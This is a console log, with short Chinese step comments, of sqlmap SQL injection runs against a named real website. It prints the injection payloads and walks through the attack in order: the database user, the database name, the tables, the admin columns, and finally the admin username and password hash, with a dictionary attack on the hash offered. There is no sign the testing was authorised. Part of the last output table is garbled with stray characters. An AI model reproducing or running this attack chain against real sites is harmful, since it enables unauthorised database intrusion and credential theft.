D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
ms "Mysql" --current-user /* 注解:获取当前用户名称
sqlmap/0.9 - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net starting at: 16:53:54
[16:53:54] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as
session file
[16:53:54] [INFO] resuming injection data from session file
[16:53:54] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[16:53:54] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=276 AND 799=799
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
Type: UNION query
Title: MySQL UNION query (NULL) - 1 to 10 columns
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: id=276 AND SLEEP(5)
---
[16:53:55] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:53:55] [INFO] fetching current user
current user: 'root@localhost'
[16:53:58] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou
tput\www.wepost.com.hk' shutting down at: 16:53:58

D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
ms "Mysql" --current-db /*当前数据库
sqlmap/0.9 - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net starting at: 16:54:16
[16:54:16] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as
session file
[16:54:16] [INFO] resuming injection data from session file
[16:54:16] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[16:54:16] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=276 AND 799=799
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
Type: UNION query
Title: MySQL UNION query (NULL) - 1 to 10 columns
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: id=276 AND SLEEP(5)
---
[16:54:17] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:54:17] [INFO] fetching current database
current database: 'wepost'
[16:54:18] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou
tput\www.wepost.com.hk' shutting down at: 16:54:18
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
ms "Mysql" --tables -D "wepost" /*获取当前数据库的表名
sqlmap/0.9 - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net starting at: 16:55:25
[16:55:25] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as
session file
[16:55:25] [INFO] resuming injection data from session file
[16:55:25] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[16:55:25] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=276 AND 799=799
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
Type: UNION query
Title: MySQL UNION query (NULL) - 1 to 10 columns
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: id=276 AND SLEEP(5)
---
[16:55:26] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:55:26] [INFO] fetching tables for database 'wepost'
[16:55:27] [INFO] the SQL query used returns 6 entries
Database: wepost
[6 tables]
+-------------+
| admin       |
| article     |
| contributor |
| idea        |
| image       |
| issue       |
+-------------+
[16:55:33] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou
tput\www.wepost.com.hk' shutting down at: 16:55:33
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
ms "Mysql" --columns -T "admin" users-D "wepost" -v 0 /*获取admin表的字段名
sqlmap/0.9 - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net starting at: 16:56:06
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=276 AND 799=799
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
Type: UNION query
Title: MySQL UNION query (NULL) - 1 to 10 columns
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: id=276 AND SLEEP(5)
---
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:56:11] [INFO] read from file 'D:\Python27\sqlmap\output\www.wepost.com.hk\se
ssion': wepost, wepost
Database: wepost
Table: admin
[4 columns]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| id       | int(11)     |
| password | varchar(32) |
| type     | varchar(10) |
| userid   | varchar(20) |
+----------+-------------+
shutting down at: 16:56:19

D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
ms "Mysql" --dump -C "userid,password" -T "admin" -D "wepost" -v 0 /*获取字段里面的内容
sqlmap/0.9 - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net starting at: 16:57:14
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=276 AND 799=799
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
Type: UNION query
Title: MySQL UNION query (NULL) - 1 to 10 columns
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: id=276 AND SLEEP(5)
---
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
recognized possible password hash values. do you want to use dictionary attack o
n retrieved table items? [Y/n/q] y
what's the dictionary's location? [D:\Python27\sqlmap\txt\wordlist.txt]
do you want to use common password suffixes? (slow!) [y/N] y
Database: wepost
Table: admin
[1 entry]
+----------------------------------+------------+
| password                         | userid     |
+----------------------------------+------------+
. ~% V3 Z3 V* N) y& `0 H1 G| 7d4d7589db8b28e04db0982dd0e92189 | wepost2010 |: e7 j2 D8 s3 ^* U; f# F0 A3 E
+----------------------------------+------------+
shutting down at: 16:58:14

D:\Python27\sqlmap>